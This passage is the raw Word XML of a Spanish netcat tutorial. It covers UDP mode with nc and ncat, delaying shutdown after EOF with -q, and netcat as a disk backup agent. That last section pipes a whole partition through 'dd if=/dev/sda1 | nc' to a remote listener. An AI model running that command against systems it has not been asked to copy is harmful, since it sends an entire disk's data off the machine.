    <w:p w14:paraId="3C4471CF" w14:textId="0C472BD6" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7"/>
    <w:p w14:paraId="21696618" w14:textId="045CB293" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7">
      <w:r>
        <w:t>Si vamos al servidor ahora, vemos que está el mensaje y que la conexión sigue abierta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733B6566" w14:textId="0009DD4A" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D904B7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="138172DE" wp14:editId="77151D16">
            <wp:extent cx="4657723" cy="605423"/>
            <wp:effectExtent l="19050" t="19050" r="1016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8854" cy="610769"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent6"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="626E51D6" w14:textId="3A44CE9B" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7"/>
    <w:p w14:paraId="7CB6D491" w14:textId="0D05AABA" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="2D73525A" w14:textId="3C2B03B0" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="59394B3B" w14:textId="0607FD8A" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="7B964835" w14:textId="4F5D187B" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="41811102" w14:textId="0F7649E7" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="47FDE408" w14:textId="7221DAD3" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="17D4BB47" w14:textId="5721588D" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="354EF72F" w14:textId="316D975F" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="5454F46C" w14:textId="5A31B610" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="4022740E" w14:textId="04CB1AAD" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="7ECB0D4D" w14:textId="4ECA347D" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="3E4C8071" w14:textId="17E85182" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="468BB5A1" w14:textId="78C3AD50" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="05DCCF60" w14:textId="030C4C5A" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="09D9CE33" w14:textId="77777777" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="51B23BEB" w14:textId="7192A8F7" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7"/>
    <w:p w14:paraId="226905B7" w14:textId="77777777" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="00D904B7"/>
    <w:p w14:paraId="5CAA73A2" w14:textId="0065AC06" w:rsidR="00D904B7" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Usar_UDP_en"/>
      <w:bookmarkStart w:id="24" w:name="_Toc182474736"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Usar UDP en vez de TCP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="6377DC6F" w14:textId="1F78B51C" w:rsidR="00D904B7" w:rsidRDefault="001B6FA2" w:rsidP="00D904B7">
      <w:r>
        <w:t>Para usar UDP en vez de TCP hay que usar el parámetro “-u” en el cliente y el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C8B3C2" w14:textId="5BBC5AF5" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="00D904B7">
      <w:r>
        <w:t>En el cliente pondremos lo siguiente “nc -u -l 1234”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FA55B9" w14:textId="7CB5EE6C" w:rsidR="001B6FA2" w:rsidRPr="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="00D904B7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6FA2">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>El -u es para usar el UDP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> en vez de TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C8911B" w14:textId="7E85B452" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001B6FA2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A639783" wp14:editId="18BB2D28">
            <wp:extent cx="5477639" cy="304843"/>
            <wp:effectExtent l="19050" t="19050" r="8890"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7639" cy="304843"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent6"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2A51FC" w14:textId="7E98268E" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7"/>
    <w:p w14:paraId="2E0C1916" w14:textId="5C307922" w:rsidR="00D904B7" w:rsidRDefault="001B6FA2" w:rsidP="00D904B7">
      <w:r>
        <w:t>En el cliente pondremos lo siguiente “nc -u ip_a_conectarse puerto”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678CCABB" w14:textId="0E3621D7" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001B6FA2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="049E68C1" wp14:editId="0AA405BF">
            <wp:extent cx="5172797" cy="257211"/>
            <wp:effectExtent l="19050" t="19050" r="8890"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797" cy="257211"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FFFF00"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA66C65" w14:textId="23222FDB" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2">
      <w:r>
        <w:t>Con esto ya tendríamos la conexión vía UDP entre el cliente y el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE3F6DB" w14:textId="03C8222C" w:rsidR="001B6FA2" w:rsidRDefault="001B6FA2" w:rsidP="001B6FA2"/>
    <w:p w14:paraId="59987AD7" w14:textId="74DA53E0" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="001B6FA2">
      <w:r>
        <w:t>Si quisiésemos hacerlo en Windows, tendríamos que poner lo siguiente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBEE91A" w14:textId="58DAFC4E" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="004D3B1B">
      <w:r>
        <w:t>Si fuésemos servidor habría que poner “ncat -u -l 1234”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1231255E" w14:textId="3D015BE5" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="004D3B1B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05E25F55" wp14:editId="13299C1B">
            <wp:extent cx="2972215" cy="333422"/>
            <wp:effectExtent l="19050" t="19050" r="19050"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2215" cy="333422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FF99FF"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="113ADD8A" w14:textId="7E771A9C" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7"/>
    <w:p w14:paraId="4A27B30D" w14:textId="2F6B11A8" w:rsidR="00D904B7" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7">
      <w:r>
        <w:t>Luego si fuésemos cliente, pondríamos “ncat -u ip_a_conectarse puerto”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399123FD" w14:textId="4E8DA638" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="004D3B1B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B2E8225" wp14:editId="424CA7EC">
            <wp:extent cx="3867690" cy="362001"/>
            <wp:effectExtent l="19050" t="19050" r="1905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362001"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="00B0F0"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="369E92AD" w14:textId="7C6DC5E5" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7"/>
    <w:p w14:paraId="3681F402" w14:textId="77777777" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7">
      <w:r>
        <w:t>Como vemos, es similar al Ubuntu solo que en vez de usar nc hay que usar ncat. Aunque si quisiésemos, en el Ubuntu también podríamos poner ncat que es lo mismo solo que es un proyecto propio de nmap.</w:t>
      </w:r>
      <w:r w:rsidRPr="004D3B1B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4DD43C" w14:textId="256BE020" w:rsidR="00D904B7" w:rsidRDefault="004D3B1B" w:rsidP="004D3B1B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004D3B1B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="364A8F82" wp14:editId="65703F39">
            <wp:extent cx="4505325" cy="400671"/>
            <wp:effectExtent l="19050" t="19050" r="952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9777" cy="407292"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FFFF00"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CCB4D0" w14:textId="038A78DD" w:rsidR="004D3B1B" w:rsidRDefault="00F97241" w:rsidP="00D904B7">
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r w:rsidR="004D3B1B" w:rsidRPr="004D3B1B">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>Enlace a una web donde lo explican</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="75847194" w14:textId="78B01216" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="004D3B1B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08FA65E6" w14:textId="0923E1E1" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7"/>
    <w:p w14:paraId="409D267E" w14:textId="20298249" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7"/>
    <w:p w14:paraId="7377ED34" w14:textId="5AD3D70E" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="0BEE14F9" w14:textId="47A7429D" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="76B356AD" w14:textId="59111C4A" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="00771D07" w14:textId="74A1365C" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="67AF56B1" w14:textId="4C9D9FA3" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="56021A2A" w14:textId="29B290F4" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="426FB65C" w14:textId="52B3B978" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="53DF0676" w14:textId="2E07BCDA" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="79E4C4D1" w14:textId="585F8D05" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="64B1E5D6" w14:textId="77777777" w:rsidR="004D3B1B" w:rsidRDefault="004D3B1B" w:rsidP="00D904B7"/>
    <w:p w14:paraId="439F3793" w14:textId="4E23C803" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7"/>
    <w:p w14:paraId="4DBCEB1D" w14:textId="63949113" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7"/>
    <w:p w14:paraId="57A54C32" w14:textId="6C890FB8" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Retrasar_que_el"/>
      <w:bookmarkStart w:id="26" w:name="_Toc182474737"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Retrasar que el servidor termine cuando reciba un EOF desde el cliente</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="566216B9" w14:textId="612CF376" w:rsidR="00F72E06" w:rsidRDefault="00D904B7" w:rsidP="00656ED8">
      <w:r>
        <w:t>Netcat está configurado por defecto para que cuando reciba un EOF termine la conexión. Para retrasar esto usaremos el parámetro “-q”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E95D1AB" w14:textId="36003A27" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00656ED8">
      <w:r>
        <w:t>En el servidor abriremos la conexión como siempre:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409832EC" w14:textId="1D168103" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D904B7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0958AEB3" wp14:editId="263C0EAC">
            <wp:extent cx="5162555" cy="266700"/>
            <wp:effectExtent l="19050" t="19050" r="1905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7554" cy="266958"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FFFF00"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03601840" w14:textId="7B2EC0EB" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7"/>
    <w:p w14:paraId="4BABE06C" w14:textId="24D0C875" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7">
      <w:r>
        <w:t>Luego en el cliente pondremos “nc -q 10 ip_a_conectarse puerto”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A6F61C" w14:textId="69FD1AC6" w:rsidR="00D904B7" w:rsidRPr="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D904B7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>El “-q 10” es para que después de 10 segundos de que el cliente reciba un EOF se cierre la conexión en vez de instantáneamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D67E31B" w14:textId="6DF3F882" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D904B7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="439196BA" wp14:editId="3E724D85">
            <wp:extent cx="5429250" cy="286757"/>
            <wp:effectExtent l="19050" t="19050" r="1905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3385" cy="291201"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="bg2">
                          <a:lumMod val="75000"/>
                        </a:schemeClr>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DF1F86" w14:textId="18490304" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00656ED8"/>
    <w:p w14:paraId="44055EAF" w14:textId="4CA104B1" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8">
      <w:r>
        <w:t>Ahora iremos al servidor y cerraremos la conexión con “Ctrl + C”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B20D9A" w14:textId="508777DD" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00515EC5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00515EC5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="780E27CF" wp14:editId="354EEC71">
            <wp:extent cx="5410955" cy="362001"/>
            <wp:effectExtent l="19050" t="19050" r="1841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0955" cy="362001"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent5"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4627C465" w14:textId="77777777" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8"/>
    <w:p w14:paraId="3228EE52" w14:textId="192E1785" w:rsidR="00D904B7" w:rsidRDefault="00515EC5" w:rsidP="00656ED8">
      <w:r>
        <w:t>Si vamos al cliente ahora,</w:t>
      </w:r>
      <w:r w:rsidR="00D904B7">
        <w:t xml:space="preserve"> habrá que esperar 10 segundos en el cliente para que se cierre:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317A9972" w14:textId="3E34987F" w:rsidR="00D904B7" w:rsidRDefault="00D904B7" w:rsidP="00D904B7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D904B7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02CB1EED" wp14:editId="49CF2F2F">
            <wp:extent cx="5401429" cy="533474"/>
            <wp:effectExtent l="19050" t="19050" r="2794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429" cy="533474"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="7030A0"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="363352E2" w14:textId="69FF6D55" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00656ED8"/>
    <w:p w14:paraId="07124FCB" w14:textId="0660DBEA" w:rsidR="00F72E06" w:rsidRDefault="00515EC5" w:rsidP="00656ED8">
      <w:r>
        <w:t>Pasado 10 segundos, la conexión del cliente se cerrará:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6057E58B" w14:textId="2B2F4EAF" w:rsidR="00F72E06" w:rsidRDefault="00515EC5" w:rsidP="00515EC5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00515EC5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00AF2059" wp14:editId="018AA998">
            <wp:extent cx="5334006" cy="406752"/>
            <wp:effectExtent l="19050" t="19050" r="19050"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3787" cy="409023"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FF99FF"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F485DD8" w14:textId="1EE87A9F" w:rsidR="00F72E06" w:rsidRDefault="00515EC5" w:rsidP="00656ED8">
      <w:r>
        <w:t>Como vemos, funciona el parámetro por lo que efectivamente si se puede retrasar el EOF desde el cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A87352" w14:textId="5D5CFAA9" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00656ED8"/>
    <w:p w14:paraId="5309187C" w14:textId="57B4D8DD" w:rsidR="00F72E06" w:rsidRDefault="00F72E06" w:rsidP="00656ED8"/>
    <w:p w14:paraId="4FF06B7A" w14:textId="55581550" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8"/>
    <w:p w14:paraId="2F3690C7" w14:textId="5B5CFFA7" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8"/>
    <w:p w14:paraId="19C88FF3" w14:textId="3E470E6E" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8"/>
    <w:p w14:paraId="470171CB" w14:textId="1D775ECD" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8"/>
    <w:p w14:paraId="077CA116" w14:textId="533C8ED3" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8"/>
    <w:p w14:paraId="55401994" w14:textId="1722364F" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8"/>
    <w:p w14:paraId="168A2BA0" w14:textId="4DB85212" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8"/>
    <w:p w14:paraId="3331582D" w14:textId="071095CF" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8"/>
    <w:p w14:paraId="224FE969" w14:textId="6EBA385C" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8"/>
    <w:p w14:paraId="79110BBE" w14:textId="1DFC6EA3" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8"/>
    <w:p w14:paraId="782D2B5E" w14:textId="77E5B247" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8"/>
    <w:p w14:paraId="41F534D2" w14:textId="76F82CD5" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8"/>
    <w:p w14:paraId="29DCF1B3" w14:textId="7F2CAA58" w:rsidR="00515EC5" w:rsidRDefault="00515EC5" w:rsidP="00656ED8"/>
    <w:p w14:paraId="6F8FE20F" w14:textId="5442D12F" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00BC32EF">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Netcat_como_agente"/>
      <w:bookmarkStart w:id="28" w:name="_Toc182474738"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Netcat como agente de copias de seguridad</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="660D5A3C" w14:textId="029507C9" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8">
      <w:r>
        <w:t xml:space="preserve">Podemos usar netcat para hacer la copia de un disco, como veremos a continuación. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5861D8" w14:textId="63D97827" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8">
      <w:r>
        <w:t>En el equipo donde se quiere hacer la copia de una partición del disco, vamos a poner lo siguiente “nc -l -p 1234 &gt; particion1.iso”:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BC32EF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F8595A8" wp14:editId="7A31A9E8">
            <wp:extent cx="6188710" cy="257175"/>
            <wp:effectExtent l="19050" t="19050" r="2159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57175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:srgbClr val="FFFF00"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D82BE" w14:textId="413E44F7" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8"/>
    <w:p w14:paraId="0CE88FA0" w14:textId="496E0BA9" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00656ED8">
      <w:r>
        <w:t>Ahora en el equipo donde se va a coger la partición del disco para copiar, pondremos lo siguiente “dd if=”/dev/sda1 | nc ip_a_conectar puerto”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC223D8" w14:textId="2E94C6AE" w:rsidR="00BC32EF" w:rsidRDefault="00BC32EF" w:rsidP="00BC32EF">
      <w:pPr>
